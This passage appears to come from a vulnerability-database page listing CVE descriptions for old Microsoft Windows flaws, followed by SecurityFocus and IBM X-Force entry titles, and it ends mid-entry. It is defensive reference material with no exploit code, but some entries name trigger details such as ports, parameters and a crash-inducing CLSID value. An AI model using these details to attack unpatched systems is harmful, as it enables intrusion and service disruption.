4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. [CVE-2003-0009] Cross-site scripting (XSS) vulnerability in Help and Support Center for Microsoft Windows Me allows remote attackers to execute arbitrary script in the Local Computer security context via an hcp:// URL with the malicious script in the topic parameter. [CVE-2003-0004] Buffer overflow in the Windows Redirector function in Microsoft Windows XP allows local users to execute arbitrary code via a long parameter. [CVE-2002-2283] Microsoft Windows XP with Fast User Switching (FUS) enabled does not remove the "show processes from all users" privilege when the user is removed from the administrator group, which allows that user to view prosesses of other users. [CVE-2002-2117] Microsoft Windows XP allows remote attackers to cause a denial of service (CPU consumption) by flooding UDP port 500 (ISAKMP). [CVE-2002-2105] Microsoft Windows XP allows local users to prevent the system from booting via a corrupt explorer.exe.manifest file. [CVE-2002-2073] Cross-site scripting (XSS) vulnerability in the default ASP pages on Microsoft Site Server 3.0 on Windows NT 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) ctr parameter in Default.asp and (2) the query string to formslogin.asp. [CVE-2002-1984] Microsoft Internet Explorer 5.0.1 through 6.0 on Windows 2000 or Windows XP allows remote attackers to cause a denial of service (crash) via an OBJECT tag that contains a crafted CLASSID (CLSID) value of "CLSID:00022613-0000-0000-C000-000000000046". [CVE-2002-1933] The terminal services screensaver for Microsoft Windows 2000 does not automatically lock the terminal window if the window is minimized, which could allow local users to gain access to the terminal server window. [CVE-2002-1932] Microsoft Windows XP and Windows 2000, when configured to send administrative alerts and the "Do not overwrite events (clear log manually)" option is set, does not notify the administrator when the log reaches its maximum size, which allows local users and remote attackers to avoid detection. [CVE-2002-1873] Microsoft Exchange 2000, when used with Microsoft Remote Procedure Call (MSRPC), allows remote attackers to cause a denial of service (crash or memory consumption) via malformed MSRPC calls. [CVE-2002-1847] Buffer overflow in mplay32.exe of Microsoft Windows Media Player (WMP) 6.3 through 7.1 allows remote attackers to execute arbitrary commands via a long mp3 filename command line argument. NOTE: since the only known attack vector requires command line access, this may not be a vulnerability. [CVE-2002-1844] Microsoft Windows Media Player (WMP) 6.3, when installed on Solaris, installs executables with world-writable permissions, which allows local users to delete or modify the executables to gain privileges. [CVE-2002-1712] Microsoft Windows 2000 allows remote attackers to cause a denial of service (memory consumption) by sending a flood of empty TCP/IP packets with the ACK and FIN bits set to the NetBIOS port (TCP/139), as demonstrated by stream3. [CVE-2002-1692] Buffer overflow in backup utility of Microsoft Windows 95 allows attackers to execute arbitrary code by causing a filename with a long extension to be placed in a folder to be backed up. [CVE-2002-1670] Microsoft Windows XP Professional upgrade edition overwrites previously installed patches for Internet Explorer 6.0, leaving Internet Explorer unpatched. [CVE-2002-1561] The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference. [CVE-2002-1327] Buffer overflow in the Windows Shell function in Microsoft Windows XP allows remote attackers to execute arbitrary code via an .MP3 or .WMA audio file with a corrupt custom attribute, aka "Unchecked Buffer in Windows Shell Could Enable System Compromise." [CVE-2002-1256] The SMB signing capability in the Server Message Block (SMB) protocol in Microsoft Windows 2000 and Windows XP allows attackers to disable the digital signing settings in an SMB session to force the data to be sent unsigned, then inject data into the session without detection, e.g. by modifying group policy information sent from a domain controller. [CVE-2002-1214] Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code via a certain PPTP packet with malformed control data. [CVE-2002-1184] The system root folder of Microsoft Windows 2000 has default permissions of Everyone group with Full access (Everyone:F) and is in the search path when locating programs during login or application launch from the desktop, which could allow attackers to gain privileges as other users via Trojan horse programs. [CVE-2002-1183] Microsoft Windows 98 and Windows NT 4.0 do not properly verify the Basic Constraints of digital certificates, allowing remote attackers to execute code, aka "New Variant of Certificate Validation Flaw Could Enable Identity Spoofing" (CAN-2002-0862). [CVE-2002-1139] The Compressed Folders feature in Microsoft Windows 98 with Plus! Pack, Windows Me, and Windows XP does not properly check the destination folder during the decompression of ZIP files, which allows attackers to place an executable file in a known location on a user's system, aka "Incorrect Target Path for Zipped File Decompression." [CVE-2002-0864] The Remote Data Protocol (RDP) version 5.1 in Microsoft Windows XP allows remote attackers to cause a denial of service (crash) when Remote Desktop is enabled via a PDU Confirm Active data packet that does not set the Pattern BLT command, aka "Denial of Service in Remote Desktop." [CVE-2002-0863] Remote Data Protocol (RDP) version 5.0 in Microsoft Windows 2000 and RDP 5.1 in Windows XP does not encrypt the checksums of plaintext session data, which could allow a remote attacker to determine the contents of encrypted sessions via sniffing, aka "Weak Encryption in RDP Protocol." [CVE-2002-0862] The (1) CertGetCertificateChain, (2) CertVerifyCertificateChainPolicy, and (3) WinVerifyTrust APIs within the CryptoAPI for Microsoft products including Microsoft Windows 98 through XP, Office for Mac, Internet Explorer for Mac, and Outlook Express for Mac, do not properly verify the Basic Constraints of intermediate CA-signed X.509 certificates, which allows remote attackers to spoof the certificates of trusted sites via a man-in-the-middle attack for SSL sessions, as originally reported for Internet Explorer and IIS. [CVE-2002-0724] Buffer overflow in SMB (Server Message Block) protocol in Microsoft Windows NT, Windows 2000, and Windows XP allows attackers to cause a denial of service (crash) via a SMB_COM_TRANSACTION packet with a request for the (1) NetShareEnum, (2) NetServerEnum2, or (3) NetServerEnum3, aka "Unchecked Buffer in Network Share Provider Can Lead to Denial of Service". [CVE-2002-0699] Unknown vulnerability in the Certificate Enrollment ActiveX Control in Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium, Windows NT 4.0, Windows 2000, and Windows XP allow remote attackers to delete digital certificates on a user's system via HTML. [CVE-2002-0694] The HTML Help facility in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP uses the Local Computer Security Zone when opening .chm files from the Temporary Internet Files folder, which allows remote attackers to execute arbitrary code via HTML mail that references or inserts a malicious .chm file containing shortcuts that can be executed, aka "Code Execution via Compiled HTML Help File." [CVE-2002-0693] Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function. [CVE-2002-0619] The Mail Merge Tool in Microsoft Word 2002 for Windows, when Microsoft Access is present on a system, allows remote attackers to execute Visual Basic (VBA) scripts within a mail merge document that is saved in HTML format, aka a "Variant of MS00-071, Word Mail Merge Vulnerability" (CVE-2000-0788). [CVE-2002-0618] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code in the Local Computer zone by embedding HTML scripts within an Excel workbook that contains an XSL stylesheet, aka "Excel XSL Stylesheet Script Execution". [CVE-2002-0617] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by creating a hyperlink on a drawing shape in a source workbook that points to a destination workbook containing an autoexecute macro, aka "Hyperlinked Excel Workbook Macro Bypass." [CVE-2002-0616] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by attaching an inline macro to an object within an Excel workbook, aka the "Excel Inline Macros Vulnerability." [CVE-2002-0615] The Windows Media Active Playlist in Microsoft Windows Media Player 7.1 stores information in a well known location on the local file system, allowing attackers to execute HTML scripts in the Local Computer zone, aka "Media Playback Script Invocation". [CVE-2002-0597] LANMAN service on Microsoft Windows 2000 allows remote attackers to cause a denial of service (CPU/memory exhaustion) via a stream of malformed data to microsoft-ds port 445. [CVE-2002-0444] Microsoft Windows 2000 running the Terminal Server 90-day trial version, and possibly other versions, does not apply group policies to incoming users when the number of connections to the SYSVOL share exceeds the maximum, e.g. with a maximum number of licenses, which can allow remote authenticated users to bypass group policies. [CVE-2002-0443] Microsoft Windows 2000 allows local users to bypass the policy that prohibits reusing old passwords by changing the current password before it expires, which does not enable the check for previous passwords. [CVE-2002-0373] The Windows Media Device Manager (WMDM) Service in Microsoft Windows Media Player 7.1 on Windows 2000 systems allows local users to obtain LocalSystem rights via a program that calls the WMDM service to connect to an invalid local storage device, aka "Privilege Elevation through Windows Media Device Manager Service". [CVE-2002-0372] Microsoft Windows Media Player versions 6.4 and 7.1 and Media Player for Windows XP allow remote attackers to bypass Internet Explorer's (IE) security mechanisms and run code via an executable .wma media file with a license installation requirement stored in the IE cache, aka the "Cache Path Disclosure via Windows Media Player". [CVE-2002-0370] Buffer overflow in the ZIP capability for multiple products allows remote attackers to cause a denial of service or execute arbitrary code via ZIP files containing entries with long filenames, including (1) Microsoft Windows 98 with Plus! Pack, (2) Windows XP, (3) Windows ME, (4) Lotus Notes R4 through R6 (pre-gold), (5) Verity KeyView, and (6) Stuffit Expander before 7.0. [CVE-2002-0224] The MSDTC (Microsoft Distributed Transaction Service Coordinator) for Microsoft Windows 2000, Microsoft IIS 5.0 and SQL Server 6.5 through SQL 2000 0.0 allows remote attackers to cause a denial of service (crash or hang) via malformed (random) input. [CVE-2002-0151] Buffer overflow in Multiple UNC Provider (MUP) in Microsoft Windows operating systems allows local users to cause a denial of service or possibly gain SYSTEM privileges via a long UNC request. [CVE-2002-0136] Microsoft Internet Explorer 5.5 on Windows 98 allows remote web pages to cause a denial of service (hang) via extremely long values for form fields such as INPUT and TEXTAREA, which can be automatically filled via Javascript. [CVE-2002-0055] SMTP service in Microsoft Windows 2000, Windows XP Professional, and Exchange 2000 allows remote attackers to cause a denial of service via a command with a malformed data transfer (BDAT) request. [CVE-2002-0054] SMTP service in (1) Microsoft Windows 2000 and (2) Internet Mail Connector (IMC) in Exchange Server 5.5 does not properly handle responses to NTLM authentication, which allows remote attackers to perform mail relaying via an SMTP AUTH command using null session credentials. [CVE-2002-0034] The Microsoft CONVERT.EXE program, when used on Windows 2000 and Windows XP systems, does not apply the default NTFS permissions when converting a FAT32 file system, which could cause the conversion to produce a file system with less secure permissions than expected. [CVE-2002-0018] In Microsoft Windows NT and Windows 2000, a trusting domain that receives authorization information from a trusted domain does not verify that the trusted domain is authoritative for all listed SIDs, which allows remote attackers to gain Domain Administrator privileges on the trusting domain by injecting SIDs from untrusted domains into the authorization data that comes from from the trusted domain. [CVE-2001-1451] Memory leak in the SNMP LAN Manager (LANMAN) MIB extension for Microsoft Windows 2000 before SP3, when the Print Spooler is not running, allows remote attackers to cause a denial of service (memory consumption) via a large number of GET or GETNEXT requests. [CVE-2001-1200] Microsoft Windows XP allows local users to bypass a locked screen and run certain programs that are associated with Hot Keys. [CVE-2001-1055] The Microsoft Windows network stack allows remote attackers to cause a denial of service (CPU consumption) via a flood of malformed ARP request packets with random source IP and MAC addresses, as demonstrated by ARPNuke. [CVE-2001-0909] Buffer overflow in helpctr.exe program in Microsoft Help Center for Windows XP allows remote attackers to execute arbitrary code via a long hcp: URL. [CVE-2001-0719] Buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via a malformed Advanced Streaming Format (ASF) file. [CVE-2001-0662] RPC endpoint mapper in Windows NT 4.0 allows remote attackers to cause a denial of service (loss of RPC services) via a malformed request. [CVE-2001-0541] Buffer overflow in Microsoft Windows Media Player 7.1 and earlier allows remote attackers to execute arbitrary commands via a malformed Windows Media Station (.NSC) file. [CVE-2001-0504] Vulnerability in authentication process for SMTP service in Microsoft Windows 2000 allows remote attackers to use incorrect credentials to gain privileges and conduct activites such as mail relaying. [CVE-2001-0351] Microsoft Windows 2000 telnet service allows a local user to make a certain system call that allows the user to terminate a Telnet session and cause a denial of service. [CVE-2001-0350] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the second of two variants of this vulnerability. [CVE-2001-0349] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the first of two variants of this vulnerability. [CVE-2001-0348] Microsoft Windows 2000 telnet service allows attackers to cause a denial of service (crash) via a long logon command that contains a backspace. [CVE-2001-0347] Information disclosure vulnerability in Microsoft Windows 2000 telnet service allows remote attackers to determine the existence of user accounts such as Guest, or log in to the server without specifying the domain name, via a malformed userid. [CVE-2001-0346] Handle leak in Microsoft Windows 2000 telnet service allows attackers to cause a denial of service by starting a large number of sessions and terminating them. [CVE-2001-0345] Microsoft Windows 2000 telnet service allows attackers to prevent idle Telnet sessions from timing out, causing a denial of service by creating a large number of idle sessions. [CVE-2001-0261] Microsoft Windows 2000 Encrypted File System does not properly destroy backups of files that are encrypted, which allows a local attacker to recover the text of encrypted files. [CVE-2001-0245] Microsoft Index Server 2.0 in Windows NT 4.0, and Indexing Service in Windows 2000, allows remote attackers to read server-side include files via a malformed search request, aka a new variant of the "Malformed Hit-Highlighting" vulnerability. [CVE-2001-0242] Buffer overflows in Microsoft Windows Media Player 7 and earlier allow remote attackers to execute arbitrary commands via (1) a long version tag in an .ASX file, or (2) a long banner tag, a variant of the ".ASX Buffer Overrun" vulnerability as discussed in MS:MS00-090. [CVE-2001-0047] The default permissions for the MTS Package Administration registry key in Windows NT 4.0 allows local users to install or modify arbitrary Microsoft Transaction Server (MTS) packages and gain privileges, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0003] Web Extender Client (WEC) in Microsoft Office 2000, Windows 2000, and Windows Me does not properly process Internet Explorer security settings for NTLM authentication, which allows attackers to obtain NTLM credentials and possibly obtain the password, aka the "Web Client NTLM Authentication" vulnerability. [CVE-2000-1218] The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache. [CVE-2000-1217] Microsoft Windows 2000 before Service Pack 2 (SP2), when running in a non-Windows 2000 domain and using NTLM authentication, and when credentials of an account are locally cached, allows local users to bypass account lockout policies and make an unlimited number of login attempts, aka the "Domain Account Lockout" vulnerability. [CVE-2000-1113] Buffer overflow in Microsoft Windows Media Player allows remote attackers to execute arbitrary commands via a malformed Active Stream Redirector (.ASX) file, aka the ".ASX Buffer Overrun" vulnerability. [CVE-2000-1112] Microsoft Windows Media Player 7 executes scripts in custom skin (.WMS) files, which could allow remote attackers to gain privileges via a skin that contains a malicious script, aka the ".WMS Script Execution" vulnerability. [CVE-2000-1079] Interactions between the CIFS Browser Protocol and NetBIOS as implemented in Microsoft Windows 95, 98, NT, and 2000 allow remote attackers to modify dynamic NetBIOS name cache entries via a spoofed Browse Frame Request in a unicast or UDP broadcast datagram. [CVE-2000-0942] The CiWebHitsFile component in Microsoft Indexing Services for Windows 2000 allows remote attackers to conduct a cross site scripting (CSS) attack via a CiRestriction parameter in a .htw request, aka the "Indexing Services Cross Site Scripting" vulnerability. [CVE-2000-0929] Microsoft Windows Media Player 7 allows attackers to cause a denial of service in RTF-enabled email clients via an embedded OCX control that is not closed properly, aka the "OCX Attachment" vulnerability. [CVE-2000-0858] Vulnerability in Microsoft Windows NT 4.0 allows remote attackers to cause a denial of service in IIS by sending it a series of malformed requests which cause INETINFO.EXE to fail, aka the "Invalid URL" vulnerability. [CVE-2000-0849] Race condition in Microsoft Windows Media server allows remote attackers to cause a denial of service in the Windows Media Unicast Service via a malformed request, aka the "Unicast Service Race Condition" vulnerability. [CVE-2000-0790] The web-based folder display capability in Microsoft Internet Explorer 5.5 on Windows 98 allows local users to insert Trojan horse programs by modifying the Folder.htt file and using the InvokeVerb method in the ShellDefView ActiveX control to specify a default execute option for the first file that is listed in the folder. [CVE-2000-0742] The IPX protocol implementation in Microsoft Windows 95 and 98 allows remote attackers to cause a denial of service by sending a ping packet with a source IP address that is a broadcast address, aka the "Malformed IPX Ping Packet" vulnerability. [CVE-2000-0653] Microsoft Outlook Express allows remote attackers to monitor a user's email by creating a persistent browser link to the Outlook Express windows, aka the "Persistent Mail-Browser Link" vulnerability. [CVE-2000-0544] Windows NT and Windows 2000 hosts allow a remote attacker to cause a denial of service via malformed DCE/RPC SMBwriteX requests that contain an invalid data length. [CVE-2000-0495] Microsoft Windows Media Encoder allows remote attackers to cause a denial of service via a malformed request, aka the "Malformed Windows Media Encoder Request" vulnerability. [CVE-2000-0331] Buffer overflow in Microsoft command processor (CMD.EXE) for Windows NT and Windows 2000 allows a local user to cause a denial of service via a long environment variable, aka the "Malformed Environment Variable" vulnerability. [CVE-2000-0228] Microsoft Windows Media License Manager allows remote attackers to cause a denial of service by sending a malformed request that causes the manager to halt, aka the "Malformed Media License Request" Vulnerability. [CVE-2000-0216] Microsoft email clients in Outlook, Exchange, and Windows Messaging automatically respond to Read Receipt and Delivery Receipt tags, which could allow an attacker to flood a mail system with responses by forging a Read Receipt request that is redirected to a large distribution list. [CVE-2000-0168] Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the "DOS Device in Path Name" vulnerability. [CVE-2000-0089] The rdisk utility in Microsoft Terminal Server Edition and Windows NT 4.0 stores registry hive information in a temporary file with permissions that allow local users to read it, aka the "RDISK Registry Enumeration File" vulnerability. [CVE-1999-1291] TCP/IP implementation in Microsoft Windows 95, Windows NT 4.0, and possibly others, allows remote attackers to reset connections by forcing a reset (RST) via a PSH ACK or other means, obtaining the target's last sequence number from the resulting packet, then spoofing a reset to the target. [CVE-1999-1127] Windows NT 4.0 does not properly shut down invalid named pipe RPC connections, which allows remote attackers to cause a denial of service (resource exhaustion) via a series of connections containing malformed data, aka the "Named Pipes Over RPC" vulnerability. [CVE-1999-0969] The Windows NT RPC service allows remote attackers to conduct a denial of service using spoofed malformed RPC packets which generate an error message that is sent to the spoofed host, potentially setting up a loop, aka Snork. [CVE-1999-0749] Buffer overflow in Microsoft Telnet client in Windows 95 and Windows 98 via a malformed Telnet argument. [CVE-1999-0681] Buffer overflow in Microsoft FrontPage Server Extensions (PWS) 3.0.2.926 on Windows 95, and possibly other versions, allows remote attackers to cause a denial of service via a long URL. [CVE-1999-0386] Microsoft Personal Web Server and FrontPage Personal Web Server in some Windows systems allows a remote attacker to read files on the server by using a nonstandard URL. [CVE-1999-0288] The WINS server in Microsoft Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service (process termination) via invalid UDP frames to port 137 (NETBIOS Name Service), as demonstrated via a flood of random packets. [CVE-1999-0228] Denial of service in RPCSS.EXE program (RPC Locator) in Windows NT. [CVE-1999-0227] Access violation in LSASS.EXE (LSA/LSARPC) program in Windows NT allows a denial of service. [CVE-1999-0012] Some web servers under Microsoft Windows allow remote attackers to bypass access restrictions for files with long file names. SecurityFocus - https://www.securityfocus.com/bid/: [90065] Microsoft Windows Kernel 'Win32k.sys' CVE-2016-0174 Local Privilege Escalation Vulnerability [102055] Microsoft Windows RPC CVE-2017-11885 Remote Code Execution Vulnerability [99012] Microsoft Windows RPC CVE-2017-8461 Remote Code Execution Vulnerability [72933] Microsoft Windows 'Netlogon' RPC CVE-2015-0005 Spoofing Vulnerability [43119] Microsoft Windows RPC Memory Allocation Remote Code Execution Vulnerability [34443] Microsoft Windows RPCSS Service Isolation Local Privilege Escalation Vulnerability [31874] Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability [25974] Microsoft Windows RPC NTLMSSP Remote Denial Of Service Vulnerability [18389] Microsoft Windows RPC Mutual Authentication Service Spoofing Vulnerability [14178] Microsoft Windows MSRPC Eventlog Information Disclosure Vulnerability [14177] Microsoft Windows MSRPC SVCCTL Service Enumeration Vulnerability [10127] Microsoft Windows RPCSS Service Remote Denial Of Service Vulnerability [10123] Microsoft Windows COM Internet Service/RPC Over HTTP Remote Denial Of Service Vulnerability [8811] Microsoft Windows RPCSS Multi-thread Race Condition Vulnerability [8234] Microsoft Windows RPCSS DCOM Interface Denial of Service Vulnerability [8205] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [8104] Microsoft Windows 2000 Unauthorized RPC Connection Weakness [6769] Microsoft Windows 2000 RPC Service Privilege Escalation Vulnerability [6005] Microsoft Windows RPC Service Denial of Service Vulnerability [3313] Microsoft Windows NT RPC Endpoint Mapper Denial of Service Vulnerability [2234] Microsoft Windows NT RPC DoS Vulnerability [1673] Microsoft Windows 2000 Malformed RPC Packet DoS Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [61498] Microsoft Windows RPC code execution [52092] Microsoft Windows Workstation Service RPC message code execution [50797] Microsoft Windows RPC Marshalling Engine code execution [49581] Microsoft Windows RPCSS privilege escalation [46040] Microsoft Windows Server Service RPC code execution [36803] Microsoft Windows RPC NTLMSSP authentication denial of service [33629] Microsoft Windows DNS Server RPC interface buffer overflow [26836] Microsoft Windows RPC mutual authentication spoofing [24491] Microsoft Windows MSRPC WebClient service message buffer overflow [23066] Microsoft Windows XP and 2000 Server MSRPC memory allocation denial of service [22481] Microsoft Windows MSRPC Plug and Play buffer overflow [17646] Microsoft Windows RPC Runtime Library obtain information [16208] Microsoft Windows RPC Locator Service buffer overflow exploit attempt detected [15709] Microsoft Windows COM Internet Service and RPC over HTTP denial of service [15708] Microsoft Windows RPCSS Service RPC message can cause denial of service [13426] Microsoft Windows 2000 and XP RPC race condition [13129] Microsoft Windows RPCSS DCOM buffer overflows [12747] Microsoft Windows RPC DCOM interface buffer overflow detected [12679] Microsoft Windows RPC DCOM denial of service [11273] Microsoft Windows 2000 RPC service could allow an attacker to gain elevated privileges [10400] Microsoft Windows 2000 RPC TCP port 135 denial of service [7528] Microsoft Windows NT and Windows 2000 malformed RPC request denial of service [7105] Microsoft Windows RPC endpoint mapper malformed request denial of service [5222] Microsoft Windows 2000 malformed RPC packet denial of service [1977] Microsoft Windows NT RPC services can be used to deplete system resources [17] Microsoft Windows NT RPC locator denial of service [86256] Microsoft Windows Knowledge Base Article 2876063 update is not installed [86097] Microsoft Windows Knowledge Base Article 2859537 update is not installed [86096] Microsoft Windows NTVDM privilege escalation 3 [86095] Microsoft Windows NTVDM privilege escalation 2 [86094] Microsoft Windows NTVDM privilege escalation 1 [86091] Microsoft Windows Knowledge Base Article 2868623 update is not installed [86090] Microsoft Windows ICMPv6 denial of service [86089] Microsoft Windows Knowledge Base Article 2862772 update is not installed [86075] Microsoft Windows Knowledge Base Article 2850869 update is not installed [86074] Microsoft Windows Unicode code execution [86073] Microsoft Windows Knowledge Base Article 2873872 update is not installed [86072] Microsoft Windows Active Directory Federation Services information disclosure [86070] Microsoft Windows Knowledge Base Article 2849568 update is not installed [86069] Microsoft Windows Windows NAT Driver denial of service [85801] Microsoft Windows Movie Maker .wav denial of service [85245] Microsoft Windows Knowledge Base Article 2848295 update is not installed [85244] Microsoft Windows Knowledge Base Article 2847927 update is not installed [85243] Microsoft Windows Knowledge Base Article 2861561 update is not installed [85236] Microsoft Windows Knowledge Base Article 2850851 update is not installed [85234] Microsoft Windows privilege escalation [85233] Microsoft Windows denial of service [85232] Microsoft Windows privilege escalation [85231] Microsoft Windows TrueType font file code execution [85230] Microsoft Windows privilege escalation [85229] Microsoft Windows privilege escalation [85228] Microsoft Windows privilege escalation [85227] Microsoft Windows Knowledge Base Article 2847883 update is not installed [85226] Microsoft Windows Media Format Runtime code execution [85224] Microsoft Windows DefenderCVE-2013-3154 privilege escalation [85223] Microsoft Windows Knowledge Base Article 2846071 update is not installed [85205] Microsoft Windows Knowledge Base Article 2845187 update is not installed [84621] Microsoft Windows Knowledge Base Article 2845690 update is not installed [84620] Microsoft Windows kernel denial of service [84619] Microsoft Windows Knowledge Base Article 2839894 update is not installed [84618] Microsoft Windows Print Spooler privilege escalation [84617] Microsoft Windows Knowledge Base Article 2839571 update is not installed [84615] Microsoft Windows Knowledge Base Article 2839229 update is not installed [84614] Microsoft Windows kernel information disclosure [84613] Microsoft Windows Knowledge Base Article 2838727 update is not installed [84571] Microsoft Windows denial of service [84546] Microsoft Windows Media Player .wav denial of service [84391] Microsoft Windows win32k.sys privilege escalation [84267] Microsoft Windows Update file detected [84156] Microsoft Windows Knowledge Base Article 2847204 update is not installed [83912] Microsoft Windows Knowledge Base Article 2829254 update is not installed [83911] Microsoft Windows denial of service [83910] Microsoft Windows Knowledge Base Article 2829530 update is not installed [83898] Microsoft Windows Knowledge Base Article 2830397 update is not installed [83886] Microsoft Windows Knowledge Base Article 2830399 update is not installed [83884] Microsoft Windows Knowledge Base Article 2834692 update is not installed [83882] Microsoft Windows Knowledge Base Article 2834695 update is not installed [83880] Microsoft Windows Knowledge Base Article 2836440 update is not installed [83876] Microsoft Windows Knowledge Base Article 2840221 update is not installed [83875] Microsoft Windows privilege escalation [83874] Microsoft Windows privilege escalation [83873] Microsoft Windows privilege escalation [83192] Microsoft Windows Knowledge Base Article 2817183 update is not installed [83100] Microsoft Windows Knowledge Base Article 2830914 update is not installed [83099] Microsoft Windows denial of service [83098] Microsoft Windows Knowledge Base Article 2829996 update is not installed [83097] Microsoft Windows privilege escalation [83096] Microsoft Windows privilege escalation [83095] Microsoft Windows denial of service [83094] Microsoft Windows privilege escalation [83093] Microsoft Windows Knowledge Base Article 2828223 update is not installed [83091] Microsoft Windows Knowledge Base Article 2813170 update is not installed [83090] Microsoft Windows privilege escalation [83089] Microsoft Windows privilege escalation [83088] Microsoft Windows Knowledge Base Article 2827663 update is not installed [83086] Microsoft Windows Knowledge Base Article 2823482 update is not installed [83084] Microsoft Windows Knowledge Base Article 2821818 update is not installed [83082] Microsoft Windows Knowledge Base Article 2820917 update is not installed [83081] Microsoft Windows Client/Server Run-time Subsystem privilege escalation [83063] Microsoft Windows Modern Mail spoofing [82776] Microsoft Internet Explorer 10 on Windows 8 sandbox security bypass [82775] Microsoft Windows kernel privilege escalation [82774] Microsoft Windows ASLR and DEP security bypass [82772] Microsoft Windows ASLR security bypass [82769] Microsoft Windows TTF denial of service [82600] Microsoft Windows Knowledge Base Article 2813707 update is not installed [82599] Microsoft Windows Live Essentials information disclosure [82523] RSA Authentication Agent for Microsoft Windows Quick Pin security bypass [82424] Microsoft Windows Knowledge Base Article 2814124 update is not installed [82422] Microsoft Windows Knowledge Base Article 2780176 update is not installed [82417] Microsoft Windows Knowledge Base Article 2801261 update is not installed [82415] Microsoft Windows Knowledge Base Article 2807986 update is not installed [82414] Microsoft Windows USB device privilege escalation [82413] Microsoft Windows USB device privilege escalation [82412] Microsoft Windows USB device privilege escalation [82410] Microsoft Windows Knowledge Base Article 2809289 update is not installed [82401] Microsoft Windows Knowledge Base Article 2813682 update is not installed [82399] Microsoft Windows Knowledge Base Article 2816264 update is not installed [82089] Microsoft Windows ZwSetInformationProcess() denial of service [81859] Microsoft Windows Knowledge Base Article 2802968 update is not installed [81858] Microsoft Windows OLE code execution [81857] Microsoft Windows Knowledge Base Article 2809279 update is not installed [81683] Microsoft Windows Knowledge Base Article 2780091 update is not installed [81682] Microsoft Windows .MPG code execution [81681] Microsoft Windows Knowledge Base Article 2784242 update is not installed [81680] Microsoft Windows Knowledge Base Article 2790113 update is not installed [81679] Microsoft Windows Client/Server Run-time Subsystem memory privilege escalation [81678] Microsoft Windows Knowledge Base Article 2790655 update is not installed [81677] Microsoft Windows TCP/IP sequence denial of service [81676] Microsoft Windows Knowledge Base Article 2790978 update is not installed [81675] Microsoft Windows NFS server denial of service [81674] Microsoft Windows Knowledge Base Article 2797052 update is not installed [81673] Microsoft Windows Vector Markup Language code execution [81672] Microsoft Windows Knowledge Base Article 2799494 update is not installed [81671] Microsoft Windows kernel privilege escalation [81670] Microsoft Windows kernel privilege escalation [81669] Microsoft Windows kernel privilege escalation [81668] Microsoft Windows Knowledge Base Article 2800277 update is not installed [81666] Microsoft Windows Knowledge Base Article 2778344 update is not installed [81665] Microsoft Windows CVE-2013-1277 privilege escalation [81664] Microsoft Windows CVE-2013-1276 privilege escalation [81663] Microsoft Windows CVE-2013-1275 privilege escalation [81662] Microsoft Windows CVE-2013-1274 privilege escalation [81661] Microsoft Windows CVE-2013-1273 privilege escalation [81660] Microsoft Windows CVE-2013-1272 privilege escalation [81659] Microsoft Windows CVE-2013-1271 privilege escalation [81658] Microsoft Windows CVE-2013-1270 privilege escalation [81657] Microsoft Windows CVE-2013-1269 privilege escalation [81656] Microsoft Windows CVE-2013-1268 privilege escalation [81655] Microsoft Windows CVE-2013-1267 privilege escalation [81654] Microsoft Windows CVE-2013-1266 privilege escalation [81653] Microsoft Windows CVE-2013-1265 privilege escalation [81652] Microsoft Windows CVE-2013-1264 privilege escalation [81651] Microsoft Windows CVE-2013-1263 privilege escalation [81650] Microsoft Windows CVE-2013-1262 privilege escalation [81649] Microsoft Windows CVE-2013-1261 privilege escalation [81648] Microsoft Windows CVE-2013-1260 privilege escalation [81647] Microsoft Windows CVE-2013-1259 privilege escalation [81646] Microsoft Windows CVE-2013-1258 privilege escalation [81645] Microsoft Windows CVE-2013-1257 privilege escalation [81644] Microsoft Windows CVE-2013-1256 privilege escalation [81643] Microsoft Windows CVE-2013-1255 privilege escalation [81642] Microsoft Windows CVE-2013-1254 privilege escalation [81641] Microsoft Windows CVE-2013-1253 privilege escalation [81640] Microsoft Windows CVE-2013-1252 privilege escalation [81639] Microsoft Windows CVE-2013-1251 privilege escalation [81638] Microsoft Windows CVE-2013-1250 privilege escalation [81637] Microsoft Windows CVE-2013-1249 privilege escalation [81636] Microsoft Windows CVE-2013-1248 privilege escalation [81634] Microsoft Windows Knowledge Base Article 2792100 update is not installed [81339] Microsoft Windows Knowledge Base Article 2799329 update is not installed [80918] Microsoft Windows digital certificate spoofing [80875] Microsoft Windows Knowledge Base Article 2756145 update is not installed [80874] Microsoft Windows XML code execution [80873] Microsoft Windows XML content code execution [80872] Microsoft Windows Knowledge Base Article 2769324 update is not installed [80869] Microsoft .NET Framework Windows Forms privilege escalation [80867] Microsoft Windows Knowledge Base Article 2769327 